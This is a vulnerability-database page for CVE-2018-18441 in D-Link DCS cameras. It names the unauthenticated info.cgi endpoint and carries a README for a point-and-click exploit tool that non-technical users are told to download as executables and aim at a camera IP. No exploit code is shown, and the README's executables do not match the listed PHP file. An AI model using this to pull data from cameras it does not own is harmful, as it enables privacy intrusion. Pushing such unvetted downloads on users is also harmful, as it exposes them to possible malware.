关联漏洞
标题:
多款D-Link产品安全漏洞
(CVE-2018-18441)
描述:D-Link DCS-936L等都是友讯(D-Link)公司的DCS系列的无线网络摄像头产品。 使用1.00及之后版本固件的多款D-Link产品中存在安全漏洞。远程攻击者可借助<Camera-IP>/common/info.cgi文件利用该漏洞访问配置文件,获取型号,产品,品牌,版本,硬件版本,设备名称,位置,MAC地址,IP地址,网关IP地址,无线状态,输入/输出设置,扬声器和传感器设置信息等。以下产品受到影响:D-Link DCS-936L;DCS-942L;DCS-8000LH;DCS-942LB1
描述
🔍 Exploit CVE-2018-18441 to access sensitive configuration data from vulnerable D-Link DCS series Wi-Fi cameras without authentication.
介绍
# 📸 CVE-2018-18441-exploit - Easily Access D-Link Camera Data
## 🏷️ Overview
This project allows users to explore a vulnerability in D-Link DCS series Wi-Fi cameras. By exploiting this vulnerability, the tool can access sensitive information that should remain secure. This README will guide you through downloading and running the software with ease.
## 📥 Download Now
[](https://github.com/AIDENTHOMASboi/CVE-2018-18441-exploit/releases)
## 🚀 Getting Started
Follow these simple steps to get started with CVE-2018-18441-exploit. No programming knowledge is required.
### 🖥️ System Requirements
- Compatible Operating System: Windows 10 or later, macOS, or Linux
- Internet Connection: Required for downloading the software
- Basic knowledge of running applications on your device
### 📦 Installation Instructions
1. **Visit the Releases Page**: To find the latest version of the software, go to the [Releases page](https://github.com/AIDENTHOMASboi/CVE-2018-18441-exploit/releases).
2. **Select the Version**: Browse the list of available versions. Choose the most recent one for the best performance.
3. **Download the File**: Click on the download link for your operating system.
4. **Extract Files (if necessary)**: If the file is in a ZIP format, right-click the downloaded file and select 'Extract All...' to unpack the contents.
5. **Open the Application**: Locate the executable file (.exe for Windows or .app for macOS) in the extracted folder. Double-click to open it.
## 📌 Using the Application
Once you have successfully opened the application, follow these steps to exploit the vulnerability:
1. **Enter Camera IP Address**: You will need to input the IP address of the D-Link camera you wish to access.
2. **Start the Exploit**: Click the "Exploit" button to begin. The tool will start gathering information from the camera.
3. **View Sensitive Data**: After the exploit completes, the application will display any accessible information gathered from the camera.
4. **Close the Application**: To exit the application, simply click the "Close" button or the window's close icon.
## 📖 Features
- **User-Friendly Interface**: Designed for ease of use, ensuring that even those with no technical background can navigate the application.
- **Multiple Camera Support**: Test multiple D-Link DCS series cameras from one interface.
- **Access Logs and Configuration Info**: Retrieve logs and camera settings that may expose sensitive information.
## 📋 Notes
- Ensure you have permission to access the camera as unauthorized access may violate laws.
- Use the tool responsibly and ethically. This is intended for educational purposes and testing in controlled environments.
## 🔗 Resources
For more information and updates, check the following links:
- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18441)
- [D-Link Support](https://support.dlink.com)
## ⚙️ Troubleshooting
If you encounter issues while using the application, try the following:
- **Verify IP Address**: Ensure you entered the correct IP address for the camera.
- **Network Connection**: Confirm that your computer is on the same network as the camera.
- **Firewall Settings**: Check your firewall settings if the application cannot connect.
## 🛠️ Contribution
If you wish to contribute to this project, feel free to submit issues or pull requests on GitHub.
## 📥 Download & Install Again
For a recap on downloading the software, visit the [Releases page](https://github.com/AIDENTHOMASboi/CVE-2018-18441-exploit/releases) to access all versions.
Thank you for using CVE-2018-18441-exploit! Your feedback helps us improve and ensures the tool remains effective.
文件快照
[4.0K] /data/pocs/4744ad364116a96535c517a34dc0dbf5950de0c7
├── [3.3K] cve-2018-18441.php
├── [4.0K] img
│ └── [ 78K] Capture.JPG
├── [1.0K] LICENSE
└── [3.7K] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。